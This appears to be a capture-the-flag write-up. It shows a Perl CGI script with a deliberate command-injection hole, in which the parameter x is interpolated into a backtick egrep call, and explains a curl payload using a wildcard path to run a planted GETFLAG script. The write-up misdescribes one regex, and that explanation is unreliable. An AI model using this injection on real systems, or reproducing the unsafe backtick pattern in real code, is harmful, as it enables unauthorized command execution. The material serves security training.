#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));

We can see a script which run on localhost:4646. This script take x and y as 
query. 

At this line: 

  @output = `egrep "^$xx" /tmp/xd 2>&1`;

We can see a code execution and it take the x parameter.

The parameter is modified by 2 regex.
  $xx =~ tr/a-z/A-Z/;
  $xx =~ s/\s.*//;

The first regex substitute lowercase by uppercase.
The secondary just remove whitespace at the begining of the string.
So, We can create a file at /tmp like GETFLAG. 
This file contain a call to /bin/getflag and redirect the output in a file. 

        /bin/getflag > /var/crash/token

We can't send /tmp/GETFLAG to the script because the 
regex will modify the path to /TMP/GETFLAG. We can replace tmp by *. 

We can call localhost with curl like that.

        curl localhost:4646?x='`/*/GETFLAG`'

